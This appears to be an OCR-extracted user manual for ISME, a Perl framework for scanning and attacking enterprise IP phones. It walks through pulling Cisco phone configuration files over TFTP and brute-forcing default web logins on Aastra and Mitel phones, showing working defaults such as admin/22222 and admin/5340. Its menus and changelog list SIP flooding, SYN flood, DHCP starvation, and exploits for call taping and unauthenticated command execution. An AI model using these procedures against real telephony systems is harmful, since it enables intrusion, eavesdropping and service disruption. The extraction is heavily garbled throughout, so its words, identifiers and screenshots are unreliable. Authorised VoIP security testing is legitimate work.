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Version follow up

V0.7 — 15/11/2012

V0.6 —

V0.5 -

V0.4 —

V0.3 -

V0.2 —

Tool: Add Cisco phone logout mobility feature abuse

Tool: Implement a module to detect the use of delangin/password on embedded
web interface from Mitel phones.

Exploit: Add Aastra ip phone information disclosu@SVDB-ID: 72941/EDB-ID
17376).

Exploit: Add Avaya Ip Office Linux voicemail passwbfile data disclosure.
Exploit: Add the script providing phone call andn@te taping on SNOM phones.

Exploit: Add Mitel AWC unauthenticated command exi@an (OSVDB-ID:
69934/EDB-ID 15807).

30/08/2012
Implement code to exploit Polycom IP Phones dataldsure vulnerability (OSVDB-
ID: 73117).

Implement code to exploit Polycom IP Phones DoSubh web interface (OSVDB-
ID: 70697).

Implement a module to detect Polycom SoundPointPliones use of default
Login/password and unprotected web interface.

Add the capacity to scan a full subnet for Aastré&SBIOM default login/password
search. Capacity to save results in text filestiess added also.

Add an integrated graphical module for Protos &IFSME (need java to work).
Cisco phone ringer & forwarder support new types ®P Phone:
7914,7915,7916,7920,7921,7925,7985

Due to some problems met by users at the instatiatifinally come back to an install
process mainly based on CPAN.

06/08/2012

Add SIP Flooding attacks (Invite, Register, Optijons
Add TCP SYN Flood attack

Update installer

Change menu presentation

12/06/2012

Add Cisco phone attacks (ringer & forwarder — slinn
Add Lan & Servers attacks (DHCP Starvation & DN®&et resolver)

12/02/2012

All kind of subnets are now support. ISME is no mbmited to “/24”. Take care, it is
done with the utilization of a new library. Be suceinstall it (or load the installation
script which add been adapted) before launchirgyrtew version.
Add the capacity to detect default password on SNBNMhones.

03/01/2012
Add an installer for all the perl modules.
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» Add the capacity to detect default password on iadst Phones.

V0.1 - 20/12/2011
First release of ISME script.
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Introduction

Initially intended as a scanner dedicated to Clgcdelephony solution, ISME has evolve in
a small framework to test IP Phones from severabesi

Nevertheless, the four goals | had in mind at thgirming are still present:
* Provide a simple tool to use,
* Trying to create something new dedicated to ipptaebay,
» Targeting enterprise solutions,
» Exploiting LAN connexion possibilities.

Cisco target

Thus my first target was Cisco IP Phone. The embedtisco IP Phone web server makes it
an easy target full of interesting stuff. Moreovéére piece of information collected should
render feasible the possibility to get the phonessfig file directly from TFTP server.
Indeed, it is much easier once we do know the naintiee file. Brute forcing TFTP is just not
really convincing. Trying to get it with proper nars truly effective. You will find in annex
A of the document a sample of the config file.Hosld help you consider how interesting it
could be to get this file.

What can 1 get ?

Business [

Cisco IP Phone Services [Orange
= CISCO IP PHONE DETAILS:
IP Phone' IP Phone Type: CP-TST50
/P Phone t SR e
L1 L]
one ype \‘;Iaiunu!gccﬂgig;‘bls
P
IP Address Gr:rt:en:uuseiﬂ.'l’: Disable
Config file: Download sucessful (SEPO02G0BIBAOFE. crif
Hostname =
s FOUND FOLLOWING SERVERS OF IPT INFRASTRUCTURE
HCP S © 192, 168.100.10
Version DNS Server . 193 168 100, 10
CUCH Server: CUCHE  Actif
Phone number ITETP Server: 192.168.100.45
GARP enable/disable

Central infrastructure:
CUCM IP@
TETE IP@
DNS IP@
DHCP IP@

PTICEGEACC RECUVED - CEane 2

Other equipment offer less possibilities but cawdgtertheless provide information such as:
» SIP/SIPS (TCP/UDP) enable
* Embedded web server
* Web server banner
» Editor identification through Mac address
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What can 1 get ?

IP@ Alive, no Cisco

IP Address
Test web server
Get web server ban

ISME v0.7

Business SEEEEE

Services &

IP adresse: 192.168.11.17 alive
Web server available.
Weh Server Banner:

ner HTTP/1.1 302 Found\x{d
Content-Leng

\xfd}

Testport UDP 5060 (SIP)  |-omeemeemmeemeeooeo s

Test port UDP 5061
Test port TCP 5060
Test port TCP 5061

Test port TCP 2000
(SCCP/Skinny)

MAC Address: 00:1b:d4:58:5h:6i
(Slps) 5060 UDP (SIP): Close
(SIP) 5061 UDP (SIPS): Close

5060 TCP (SIP) : Close

5061 TCP (SIPS): Close
(SIPS) 2000 TCP (SCCP) : Close

!
Location: htiﬁs :£/192.168. 11. 17/indesx. htmlix{d)
Ohacgd}
Server: Allegro-Software-RomPager/4. 34\={d}

Device editor: Tandberg Data ASA'sx{d}0016AS5\n
6

F =

What else?

ISME is now able:
To identify default login/password for SIP phonasgtra, Mitel, Polycom, SNOM),
Implement attack dedicated to Cisco Phones,
Implement different server side attacks,
Specific code to implement exploits,

Add GUI for external fuzzers to provide a complgte of tools.

L ale A

sme.pl (IP Phone Scanning Made Easy)

File History FHller

Tools | Exploits

Subnet to scan (192.166.1.0/2"

Default Log: Aastra IP Phone
Default log: SHOM IP Phone
Default log: Polycom SoundPoint IP Phone

Cisco Phone: Ringer (SCCP)
Cisco Phone: Forwarder {SCCP)

SIP flooder (Invite, Options, Register)
SIP Fuzzing - Protos SIP

Server: DHCP Starvation
Server: DH3 Subnet resolver
Server: TCP 3¥N Flood

Date: 15/11/2012
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1- A quick comparison with existing scripts

SVCRACK
ISME NMAP ,SVIY'AP ?VYVAR (sipvicious [SIPVICOUS| SMAP |Metasploit
(sipvicous) (sipvicous) )
GUI interface Y Y N N N N N Y
CLl interface N Y Y Y Y Y Y Y
Detect SIP port over UDP Y Y Y N N Y Y Y
Detect SIPS port over UDP Y Y Y N N Y ? Y
Detect SIP port over TCP Y Y N N N N ? Y
Detect SIPS port over TCP Y Y N N N N ? Y
Identified web server presence Y Y N N N N N N
Grab web server banner Y Y N N N N N N
Web server brute forcing Y N N N N N N N
Got SIP user agent information N NSE ? Y N N Y Y Y
Got SIP Options N NSE ? Y N N Y Y Y
Brute force SIP Password on
extension N N N N Y Y N N
Find active phone number /SIP
wardialing N N N Y N Y N Y
Resolve device editor through
mac@ Y ? N N N N N N
Identified clearly Cisco IP Phone
model Y Depend N N N N N N
Get applicative informations of
Cisco IP Phone Y N N N N N N N
Get infrastructure server
information used by Cisco IP
Phone Y N N N N N N N
Get Cisco IP Phone config file on
TFTP server Y N N N N N N
Save the results Y Y Y Y Y Y ? ?
Reload result for analysis Y Y N N N N
Filtering the result to focus on
specificitem Y N N N N N N ?
SNOM brute force Y N N N N
Polycom brute force Y N N N N
Mitel brute force Y N N N N
Aastra brute force Y N N N N
Cisco mobility abuse feature Y N N N N
Cisco phone forwarder Y N N N N
Cisco phone ringer Y N N N N
SIP Fuzzing (Protos embedded) Y N N N N
SIP Invite flooding Y NSE ? N N N
SIP Options flooding Y NSE ? N N N
SIP Register flooding Y NSE ? N N N
DHCP Starvation Y N N N N
TCP Syn flood Y N N N N
DNS Subnet resolver Y N N N N
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2-  Working environment

2.1- Dev environment

2.1.1- Library

ISME has been developed in Perl. Thus it should aaonnearly every operating system
running perl.

The following libraries are needed:
* LWP::UserAgent; #http://search.cpan.org/~gaas/libwww-perl-
6.03/lib/LWP/UserAgent.pm
* HTML::Parser; # http://search.cpan.org/dist/HTML-sta/Parser.pm
* Net::Ping; # http://search.cpan.org/~smpeters/Nieg-2.36/lib/Net/Ping.pm
* Net::Netmask; # http://search.cpan.org/dist/Netahsesk/
* Net::Subnets;
* Net::TFTP; #http://search.cpan.org/~gbarr/Net-TFTP-0.16/TFTP.pm
* Net::DHCP::Packet; # http://search.cpan.org/~djx@t-DHCP-
0.69/lib/Net/DHCP/Packet.pm
* Net::DHCP::Constants; # http://search.cpan.orgbdiiet-DHCP-
0.69/lib/Net/DHCP/Constants.pm
* Net:Libdnet::Arp;
* Crypt::SSLeay; #http://search.cpan.org/~nanis/C8®Leay/SSLeay.pm
* LWHP::Protocol::https ; #http://search.cpan.org/-sga&/P-Protocol-https-
6.02/lib/LWP/Protocol/https.pm
* Mozilla ::CA;#s http://[search.cpan.org/~abh/Mozi0#A-
20111025/lib/Mozilla/CA.pm
 HTTP::Request::Common; # http://search.cpan.or@st#il TP-Message-
6.02/lib/HTTP/Request/Common.pm
* Net::Subnets
» Tk; #http://search.cpan.org/~ni-s/Tk-804.027/poai@uide.pod
* Net::RawlP; #http://search.cpan.org/~saper/Net-RaR5/lib/Net/RawIP.pm
Take care, even if libraries are not explicitly lkdeed in the script, there are needed
nonetheless.

Javamust be installed on the computer if you intendde Fuzzing SIP — Protos.

2.1.2- Threads

Threads must be activated for Perl. If it's not tlase some tools won’t be working. To verify
the threads status, enter “perl —V” in a terminélyou find “useithreads=undef” in the
answer, you must recompile your perl version whtteads option.

Note: installing thread modules from CPAN won'’t chanige situation.
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MBP-2:isme cedricbaillet$ perl -V
Summary of my perl5 (revision 5 version 12 subversion 3) configuration:

Platform:

osname=darwin, osvers=18.8.8, archname=darwin-multi-2level

uname='darwin beta.macosforge.org 18.8.0 darwin kernel version 18.8.8: tue jum 7 16:33:36 pdt 2
811; root:xnu-1584.15.3~1release_i386 1386 '

config_args='-D inc_version_list=5.12.2/darwin-multi-2level 5.12.2 5.12.1/darwin-multi-2level 5
.12.1 5.12.8/darwin-multi-21level 5.12.8 -des -Dprefix=/opt/local -Dscriptdir=/opt/local/bin -Dcppfl
ags=—I/opt/local/include -Dccflags=—pipe —02 -Dldflags=—L/opt/local/lib —Dvendorprefix=/opt/local
-Dusemultiplicity=y -D cc=fusr/fbinfgcc-4.2 -D ld=fusr/bin/gcc-4.2 -D manlext=1pm -0 man3ext=3pm -D
manldir=/opt/local/share/man/manlp -D man3dir=/opt/local/share/man/man3p —D sitemanldir=/opt/local
/share/man/manl -D siteman3dir=/opt/local/share/man/man3 -D vendormanldir=/opt/local/share/man/manl
-D vendorman3idir=/opt/local/share/man/man3 -D pager=/usr/bin/less —sR'

hint=recommended, useposix=true, d_sigaction=define

, usemultiplicity=define
useperlio=define, d_sfio=undef, uselargefiles=define, usesocks=undef

For those who are working on a MAC, with mac podlt enter the following command in a
terminal: “sudo port install perl5 +threads”. ltosid do the trick.

2.1.3- Tested operating system

The following operating systems have been testedoaking with version 0.6:
* Macosx 10.6.8
* BackTrack 5 R3
I would welcome any information on deployment ohestLinux flavor {sme_sec@yahoo)fr

2.2- Installing perl modules

Since there are many perl modules to install ireptd have a working ISME script, | put
some of them in the directory “PerlIModuleSourcethaé proper script either to compile or
get them through CPANRooOt level and Internet connection are mandatory
- User has the choice to install them by himselivith the above procedure -

i 1
MBP-2:isme cedricbaillets ENNSISHNRSESISERINSEUEUINEIES
ISME: Starting to install perl modules

ISME: Uncompressing local archives
x Crypt-SSLeay—0.64/

x Crypt-5SLeay-0.64/certs/

x Crypt-SSLeay-0.64/Changes

x Crypt-SSLeay-0.64/eq/

x Crypt-SSLeay—0.64/1lib/

x Crypt-5SLeay—0.64/Makefile.PL

x Crypt-5SLeay—8.64/MANIFEST

x Crypt-SSLeay-B.64/MANIFEST.SKIP
x Crypt-5SSLeay—8.64/META. json

x Crypt-5SLeay—0.64/META. yml

Checking if your kit is complete...

Looks good

Writing Makefile for Net::TFTP

cp TFTP.pm blib/Llib/Net/TFTP.pm

Manifying blib/man3/Net::TFT

Manifying blib/man3/Net::TFTP.3pm

Installing /fopt/local/lib/perl5/site_perl/5.12.4/Net/TFTP.pm

Installing fopt/local/share/perl5.12/siteman/man3/Net::TFTP.3pm

Appending installation info to /opt/lecal/lib/perl5/5.12.4/darwin-thread-multi-2level/perllocal
. pod

ISME: DONE

MBP-2:isme cedricbaillet$ [i
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Note:
Net::Libdnet needs libdnet library. It can be dowad fromhttp://libdnet.sf.net
If the installation is needed the following erroessage should appear :

Libdnet.xs:37:18: error: dnet.h: No such file orectory.

2.3- Directory structure of ISME

CiscolpPhoneConfigFile directory containing the phones configurationedil obtained
through TFTP.

Doc: directory containing documentation. No surprise.
Exploits: contain scripts exploiting specific weakness.
Isme_data: containing file needed for a proper running of IEM

PerIModuleSource: sources for specific perl modules needed for ISM#6rk in correlation
with “installPerIModulev0.5.sh”.

Scan_history: directory containing all the results of all scdaatomatically generate at the
end of the scan). Files in this directory coulddsased by hand or through ISME interface
(menu “History->Delete saved scans”).

Tools: containing perls script for the tool menu.

User_data: default directory for the saved file of the user.

2.4- Where to get the script

ISME is host on freecode web portal. Here is tloggut url:
http://freecode.com/projects/ip-phone-scanning-nreaey/-isme
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3- Launching ISME

WARNING: ISME need to be run as root, hence theoduslow.

1. Open aterminal
2. Go to the directory containing isme.pl
3. Enter the following command “sudo perl isme.pl”

Last login: Tue Dec 28 15:22:58 on titys@od

:~ cedricbaillets

~ cedricbaillets

:~ cedricbaillet$

:~ cedricbaillets

:~ cedricbaillet$ cd isme_v@.

:isme_v@.1 cedricbaillet$

:isme_v@.1 cedricbaillet$

:isme_v@®.1 cedricbaillets

sisme_v@.1 cedricbaillet$ ls
CiscolpPhoneConfigFile isme_gastrabruteforce.pl user_data
Doc isme_data
isme.pl scan_history
mbp:isme_v@.1 cedricbaillet$
mbp:isme_v@.1 cedricbaillet$

mbp:isme_v@.1 cedricbaillets EGGNPERIESHENII

This should launch a GUI interface as describatkixt page.
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4- Scanner tool

4.1- The Graphical User Interface

User interface

Business
Services

R - Xaka N ils_m;.pl {IP Phane Scanning Made Easy)
functions ol e -: Subnetto
Submat to scan (192.168.1.0724): | [
B R e e A L R I scan
[FHYIHO 70 FIMD IDENTIFIED UEVICES WITH ESEDUED WES SERVERS o
I[E adresse: 192 168.11.17 alive
wek aerwer awnilable
Weh Server Baanor
e Log ofthe
TR AL 1 302 Found\xid) I
[Locataan, hittps //192 168, 11, 17/andax. hexl\x(d) scan
At ARE-Lang c{d) T
!S-e:ver hllugro-Sof;.vn:e-nanogerJd Bdiac(d) RESI..Elt Df flltEF
x(d) | ;
| functions
il:-zvl:e edi b mta ASA'ac(d)DILEAS
A Addrean (13
5060 UIP (SIP)
[5061 wme (SIRS)
E060 TP (SIE)
|5961 TOP (FIPS) | Close
[152.68,11.13 FISCO TP PAONE DETMILS I3
1521681115 I=_ Fhone. Type . L= 13150 |
2 IF Addeens: 192 162.11. 15 alive
192.1E8.11.16 Bostnane: SEPOOIECEIBADED
1921681117 par i sntz?gjgai—ls |
Ly 8 MIRESE &
152"“'”";: Geatuitons ARP. Dissble 5
:z-::-:{ﬁ: Config File: Downlond socessFul (SEROOZECHIBAINSuant Deatail
& ! e 1
! concerming
FORD FOLLOVING SERVERS OF 1PT IMPRASTRUCTURE o
pite Serwer: 192 16810010 : the active IP@
j DS Secwar . 192 16810910
Active IP@ —— CUE Server. CUCNB  Acrif !
fr¥Te Server: 192 168 100,45
Show dilais of seectod IP addmess
PT/ECEGESOLE SE0U/NVED — Chaled e 2

Date: 15/11/2012
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4.2- How to launch a new scan?

The procedure is simple enough:

1- Enter the subnet with following syntax: 192.168/240
2- Launch the scan through the menu File->Launch sognn

Launch a new scan

Business SRS
Services SISNSS

= Nalal
File | History  Filter

|
Seanning [ Th0rd i Subnet to
Launch ——s Launch ||132.16811.0/24

% isme.pl (IP Phone Scanning Made Easy)

~ scan
scanning Save as CSY (MS Excel) =
through Saves as CSV (Open Office)
menu. it

GOOD News: results automatically saved
WARNING

: Nothing can Iﬂle done while the scan is unFI'er going !

CYale

. WARNING
File:

i’s—ca}aﬁ-mg_ s under E'Etplez.xon. No action allowed until it's finished.
e

Three limitations are presents right now:

* Any subnet you wish as long as it has de corratiagyX.X.X. X/XX
Nothing can be done while the script is scanning,

Scanning a subnet could take 25 to 30 minutes frgnown experience.

It should be overcome in future versions. Yes | rhbayable one day to work out how to
develop proper multithreading...

Date: 15/11/2012 By Cedric Balillet Page 15
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4.3- Exploit the scan results

4.3.1- Understand the interface and the basics

The results of the scan will exploit all part oetUI. Upper window (step 0) will contain
raw logs. By raw | mean that positive and negateseilts are present.

Left lower part (step 1) will contain all the IPdrdsses that have been found active.

Right lower part (Step 3) will contain the infornmat specifically link to an IP address. To
have them, the ip address must be selected andatedi with the button “show details of

selected IP address” (Step 2).

End of the scan, exploit data 1/3

Business |
Services

AOH b isme.pl (IP Phane Scanning Made Easy)
Filo Histary Fiter |

mtmﬂ:ﬂl[lfﬁlﬁﬂlmﬂ | |

[F adreass: 192 168, 11,17 alive

- il g available
Iftell Iu |Ih'b Server Banmnr
ullfog [BTTR /L 1 702 Poundix

[dy}
windows [Lacazion hta:s -‘."W“ 16\! 11 17/andex, himlixid)
A |L‘onun: Ly di
:e:se: Allegro- Sn!tvare ~Foafager/d, Miw(d)
)

Donr.e editor Tmé-e: !ata m\xid o0l Ba5\n
A Addseas 0 1h 43555k 66

|5-ﬂﬁ|:| DR (SIR) Cloﬂ:

{S0EL UBP (SIPS): Clase

|5€I50 TCP (9IF) ; Rloms

(5061 TCP (SIPS) | Closs

[152.168.01.13 CISC0 1P PHONE OETALLS
. 1““' ] IF Phone Type: CP-THTSG
,S,IEE.L I & IF Address 102168 11.15 alive
Select Active |1Q <160.11.16 Hostntne : SEROOCECEIBAEG
|132]Eﬂ 11T Wersion: SCCRT5 5-2-15 " St 3
Phone namber 3733 ep g
IP@ I1az SIREELARE eabuiteus ARP: Dissbls P T | =
[182.160.11,263 Banfig File: Soumlsad sucessful (SEPDO26CHIBADYS cat | Examine data
192.164.11.254 ol .
conceming
POTND POLLOVING SERVERS OF IPT INPRASTIUCTURE lected i
DHEE Server: 192,168 106,10
DNS Serwer - 192 166100 10 Il selected ip@
CUTM Server. CUCMB. Actif |
IT¥T® Secvec: 192 168 10045
Step 2: I i
Validate with —— Show dutais of selscied IP addess
button

PTIECE SO UCE SECUMED ~ G Swkat o T

4.3.2- Smarter input
Unified communication servers are often configutetbugh web server. Those ones are

letting some informations sleep out, which perroiidentify some of them. When a proper
identification is realize, it appears as SMART INPIld the windows log.

Date: 15/11/2012 By Cedric Balillet Page 16
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[ ML ) % isme.pl {IP Phone Scanning Made Easy)

File History Filter Tools Ezploits

Subnet to scan (192.168.1.0/24); |

IP adresse: 192.168.100.8 alive.

Weh server available,

Webh Serwer Banner:

HTTP/1.1 400 Bad Requestixi{d}
Transfer-Encoding: chunkedioc{d}

Date: Thu, 30 Aug 2012 13:23:32 GMTx{d}
Connection: close‘x{d:

Secver: xidi

haid}

Smarter Tnput: Cisco Unified Presenced
Device editor:

MAC Address: 00:50:56:80.00.00

S0&0 UDP (5IP): Open or Filter

E0&l UDP (SIPS): Open or Filter

E0&0 TGP (SIP): Open

G061 TCP (SIPS): Open

"\ [192.168.100.3
192.168.100.5
192.168.100.6
192.168.100.7
192.168.100.5
192.168.100.10
192.168.100.11
192.168.100.12
192.168.100.13
192.168.100.16
192.168.100.18
192.168.100.19
192.168.100.24
192.168.100.28
7 [192.168.100.31

Show details of selected IP address

>4

v — sl

The following servers could be identified todayotlngh “smarter input”:

e Alcatel-Lucent OmniVista 4760 NMS
*  OmniPCX for Enterprise

e Alcatel-Lucent OmniTouch 8660

» Alcatel-Lucent Omnitouch 8400

» Cisco Unified Contact Center Express
 CISCO Codec

* Codian MCU

* Aastra Management 7450

» Cisco Unified Communications Manager
e Cisco Unified Presence

» Cisco Unity Connection

* VMware ESX Server

Date: 15/11/2012 By Cedric Balillet
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Ok, so we have some result, we can select an igessldo see some stuff, but how could |
find an information and sort it out for 250 IP Pher? Well, through the filtering functions. It
will provide the capacity to sort out result in tlog windows (upper ones). Here are the

filters that are available today:
e SIP UDP/TCP
 SIPS UDP/TCP
* Embedded web server
» Cisco IP phone

» See all logs (print raw information in log windoagain)

End of the scan,
| Filter functionality

[y

b Isme.pl P Phane Scanning Made Eavy)

[y o]

exploit data 2/3

— BEE ALL LOGS

i 5 - 5360 UDP (S1F): Open
L8 1
[ et my 5061 UDP (SIPS): Opan
Server Ba 5060 TCP (SIP): Open
?m“nl. “és S061 TCP (SHP): Open F;
ats: Tob, D6 roq Opae

{Secver: cisoo Pt |
ma ‘Web server avaiabie
thentic o 1P P

T I ]

is_ sccess®\x[d)

{Bewice »di ::
s ddre

(5560 e co1ey | 1

WP (STPS) "-"u or ¥iltar
02 (51) . Gles

|/ heeenaem |
Fhow detadly of detectud (T addrrss

FTSEE G S/ SECL D — G

ane

File  Hetory  Filer

) Select the
ol = filter

Sabrt to sean (1920681 024 [

Business
Services

Getthe result

| ivmepl (I Phons Scanning Made|Easp)

197,168,113
192,168.11.15
1921681116
1AGHITAT
i-_; 1921681119

192.168.11.253
182,168,11.254

[TRYTNG TO FING TNENTIFIED DEVICES WITH ENBEDDED VER SERJERS

]
£ 168 11 17/ index: Bimle(d)

vare-RonPager b 34 (4]

1 Close
04 TV (SIB). tloms
E061 TOF {SINS] Close

K P Fllﬂlﬂ: ar'a. L!
113 Phene e
(17 Whdcean: 197 G611 13 alive
mnma!e Sl(?ﬂﬂlﬁ 0

Tver 15 163 lﬂOéS

Show dokats of selecind I widriss

Those filters help to sort out the information todgeper in details if need be.

Filter results can be saved in a text file thronggnu “File->Save logs”. The default location
of the saved file is in user_data directory.

Date: 15/11/2012
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Reload an old scan

Completed scans are automatically saved in thetding “scan_history”. The syntax of files
is the following: year-month-day-time-scanned netwieme. It is a texte file even | the

extension is

“isme”.

By going in menu “history-> open saved scan”,
further analysis.

4.6-

Open an old result for further analy

% Isme.p| (IP Phone Scanning Made Easy)

18

thfikes could be reload in ISME for

1/2
= Business [
Services

Subne ay: |

TP adresss: 192, 168 I.l 1T aliwe
Web server available
Uob Sorver Bmwr

H’!'l?.l‘i 2 302 Found'\x(d)
Location: https: .-"!“192 168 11 17/tjdex hitmloe( d)
[Contant-Lang O\x{d]
i:r:at Allegra- Snftvare—RnaPagerﬁl 3he(d)
]

De\m’-e edltor 'Iw‘dbn:g Batn PpSM.xNiWI.&\S\n

5051 UDP CSIPSJ Cloae
S060 TCP (SIP): Cloae
E061 TCP (3IPS) . 0lose

10 adresss. 102,168 11 17 alive

192.168.11.13
192.168.11.15 :z]g ;er::r ;vailzblo
192.168.11.16 e e
192.166.11.17 Im\?!t 1 202 Pound'x{d}
192.166.11.19 Location: https: r,f:sm 168, 11. 17/index. htalix(d)
192.160.11.253 TonbantrLeg
i e Server: Allegro- So!tﬂre RonFager /4, Mhx(d)
192.160.11.254 id}

2000 TGP (5GCP) : Close

Show details of selected IP address

A

|E
==
ill Filg ;|

Step 1: Launch action
Step 2: Select result file

M. YaTe
ntn:l.r.'y'.

|D:Un 11221 WS%mn - 122 N80 015
|Dzo\|ns—zma ~192] 8811 0 jsme
|!|320|| 11-5-12020mn 192} 58 11 0 sme
[T 2011-11-5-12N30ma -152 6811 Disne

5. Open
 Wsersiceilchaietismelscan istory

=l =

|D 201111 a-l'ml mn -192 060110 fsme
1§ {0 2017=11=5=3n2mn =192, 16511 0 klsmn
|L.2011 11-5-3h58mn -122 11710 lsme

Files of fype: ke fils (~ k) —=|

Cisco IP Phones already tested

The script has been found working on the follow@igco IP Phone models:

Date: 15/11/2012

CP-7942G test OK. English interface.
CP-7961G test OK. English interface.
CP-9971 test OK. English interface.

CP-7971G-GE test OK. English interface.

CP-7985 test PARTIAL. English interface.s

CP-7975G test OK. French interface.
CP-7970G test OK. French interface.

By Cedric Balillet
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5- Tools: IP Phone web server default password identification
5.1- Introduction

Many SIP IP Phones have an embedded web serveorto am their configurations. Basic
authentication is the usual way to get in. The idkthis module is to test those web servers
with the usual default passwords of major editors.

The attack could be done in three ways:
- The attack is launched on the current load suloast.dt will analyze it to get all the
devices with a web server and launch the test.
- The attack could be launch on a single IP address
- The attack could be launch on a specific subnet.

More editors should come with other versions angbojoinities to find devices.

5.2- AastraIP Phones

Step 1:Menu “Tools->Default log: Aastra IP Phone”. A ngindow will open.

A NO \ isme.pl (IP Phone Scanning Made Easy)
| File History Filter Toois | Exploits ‘

Subnet to scan (1921681002 -

Default log: Aastra IP Phones —_ l.
Default log: Mitel IP Phones

Default log: Polycom SoundPoint IP Phones
Default log: SNOM IP Phones

Cisco Phone: Ringer (SCCP)
Cisco Phone: Forwarder (SCCP)
Cisco Phone: Logout mobility feature abuse

SIP flooder {Invite, Options, Register)
S|P Fuzzing - Protos SIP

Server: DHCP Starvation
Server: DNS Subnet resolver

r{'l— Server: TCP 5¥N Flood

D=
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Step 2:Chose your scanning option

anNn

W Tﬁzs,#sfavl&ﬁ%ﬁfﬂé&iﬂ!mmﬁq@

File

% IP Phone from scanned subnet

Selected scan file (isme): |

~ dingle 1P Phone
IP address to scan {192.168.0.154): |

-~ acan a subnet
Subnet to scan (192.168.0.0/24): |

g

IP Phone from scanned subnetthis option will use the results of a global scame earlier
to extract unidentified active IP address with asagiate web services. It will then test it for

Aastra default login/password.

Once the option is selected, it is necessary t tba file containing older scan result. It is
done through the menu “File ->“Select subnet alo

8N

\_ Test default Aastra Login/Password

File

- et

Select subnet scan to load
Launch brute force attack
Save scan results

Exit

54): |

B L T R T ) L
Subnet to scan (192.168.0.0/24): |

A new pop up will appear. Browse the directory artict the file.

alale) | Test default Aastra Login/Password
File
4% |IP Phone from scanned subnet
Selected scan file (.isme): |
- Scanas Directory: fUsers/cedrichailletismefscan_history — |
Subnet 10 S¢ (™ 2071-11-13-12h56mn -192.166.7.0.sme [ 2012-0-21-16h1mn -202 ¢

[ 2011-11-19-17h3Bmn -192.168.12 0.isme [] 2012-0-21-16h53mn -202.¢
[1 2011-11-19-17h3mn -192.16812.0sme [ 2012-0-21-16h539mn -172."
[ 2011-11-6-11h9mn -192 1 BE460isme [ 2012-0-21-17h3mn -190.2(
[ 2011-11-9-16h47mn -10.193.139.00sme [ 2012-0-5-16h51mn -192.1¢
[ 2011-11-9-18h13mn -10.193154.0dsme [ 2012-1-13-14h11mn -192°
[ 2012-0-12-16h53mn -10.158.212.00sme [ 2012-1-13-14h23mn -192.°

| | -

Fllename:l |‘ Open |

Files of type: isme files (".isme) -t | Cancel |

Date: 15/11/2012
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Single IP Phone:This option will test only one IP address.

Lo e M) |\ Test default Aastra Login/Password

File

-~ |IP Phone from scanned subnet

Selected scan file (.isme): |
% Single IP Phone

IP address to scan (192.168.0.154): |1 52 168.12.87

-~ Scan a subnet

Subhet to scan (192.168.0.0724): |

Scan a subnetthis option will scan a full subnet and test alivee IP address (evaluate

through a ping). Subnetting is supported.

[AOO %] Test default Aastra Login/Password

File

. |IP Phone from scanned subnet

Selected scan file (Jisme): |
..~ Single IP Phone

IP address to scan (192.166.0.154): |
# Scan a subnet

Subnet to scan (192.168.0.0/24): |1 92.166.12.0/24

Step 3:launch the test itself. Menu “File” -> “Launch beuorce attack”

[ 2 M B |\ Test default Aastra Login/Password

et
Select subnet scan to load

Launch brute force attack
Save scan resulits

rsfcedrichailletismesscan_history/2011-11-19-17hdmn -132.168.12.0.

Exit 54): |

Subnet to scan (192.166.0.0724): |

Step 4:analyze the results.

. YaYs \| Test default Aastra Login/Password

File

«~ |P Phone from scanned subnet

Selected scan file (isme): |
% Single IP Phone

IP address to scan (192.168.0.154): [152.54.12.17]

-+~ 3can a subnet

Subnet to scan (192.168.0.0/24): |

Date: 15/11/2012 By Cedric Balillet
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AN |\| Test default Aastra Login/Password
File

~- IP Phone from scanned subhet

Selected scan file (isme): |
-~ Single IP Phone

IP atdress to scan (192.168.0.154): |
4 Scan a subnet

Subnet to scan (192.168.0.0/24): I'I 92.54 12.0/25

——————— Testing 152 54 12 37 :5
——————— Testing 152.54. 12 38

——————— Testing 152.54.12. 39

——————— Testing 152.54. 12 40

152 54 12.40: test admin/22822 — WARNING => used
——————— Testing 152.54. 12 41

152 54 .12 41: test admin/22222 - WARNING => used _J
——————— Testing 152. 54 12 .42

——————— Testing 152 54 12 43

152 54.12.43: test admin 22822 - WARNING => used
——————— Testing 152 54.12. 44

Do,
——————— Testing 152. 54 12 45
——————— Testing 152. 54 12 46
——————— Testing 152.54.12.47
Do,

——————— Testing 152 54 12 48
——————— Testing 152. 54,12 .49
——————— Testing 152.54.12.50
——————— Testing 152.54. 1251

Step 5:Results can be saved in a text file for later ysial Just go to “File->Save scan
results”.

ANM |\ Test default Aastra Login/Password

et
rsfcedrichailletismesscan_history/2011-11-19-17h3mn =132 168.12.0.

Select subnet scan to load
Launch brute force attack
Save scan results

Exit

FTOCET O SuiET

Subnet to scan (192.166.0.0/24): |

54): |
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5.3- MITEL IP Phones

Step 1:Menu “Tools->Default log: MITEL IP Phone”. A newindow will open.
AN MA 1\ isme.pl (IP Phone Scanning Made Easy)
I File History Filter Toolsl Exploits ‘

Subnet to scan (192.168.1.072°
Default log: Aastra IP Phones _ -S

Default log: Mitel IP Phones
Default log: Polycom SoundPoint IP Phones
Default log: SHOM IP Phones

Cisco Phone: Ringer {SCCP)
Cisco Phone: Forwarder (SCCP)
Cisco Phone: Logout mobility feature abuse

SIP flooder {Invile, Options, Register)
31P Fuzzing - Protos SIP

Server: DHCP Starvation
Server: DNS Subnet resolver /

EI— Ser\-ﬂar: TCP S¥N Flood _[E

Steps 2 to 5 are identical to 5.2 with Aastra phorse Please refer to it.

Note: MITEL IP Phones have different default login/passivdepending on models and
versions.

Default login/Password of the following MITEL IP Phones are tested:
-» 5212
-» E215
-» 5220
-» 5320
-» 5330
-» 5340

Since there is one kind of password per type ofa#ggethere must be several tests for each
phone. Therefore, the sequence of verificatioeadly long. Be patient.

ann || Test default MITEL Login/Password
File |

- Single IP Phone
IP address to scan {192.168.0.154): |50.4.106.13
% 3Scan a subnet

Subnet to scan (192.168.0.0/24): |50.4.1 06.0/24

Unreachable
———————— Testing 50.4.106.130
E0.4.106.130: test adnin/5340 - WARNING =»> used

L

——————— Testing 50.4.106.131
Unreachahle

——————— Testing 50.4. 106,132
Unreachable

——————— Testing 50.4.106. 133
Unreachable

——————— Testing 50.4.106.134
Unreachahle

——————— Testing 50.4, 106 135
Unreachable

——————— Testing 50.4. 106,136
Unreachable

——————— Testing 50.4.106.137
Unreachzble

——————— Testing 50.4.106.138
Unreachahle

——————— Testing 50.4, 106, 138
Unreachable

——————— Testing 50.4.106.140
Unreachable

——————— Testing 50.4. 106 141
Unreachable

——————— Testing 50.4.106. 142 J
E0.4.106.142: No default login/password.

——————— Testing 50.4.106.143
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5.4- SNOM IP Phones

Step 1:Menu “Tools->Default log: SNOM IP Phone”. A newndiow will open.

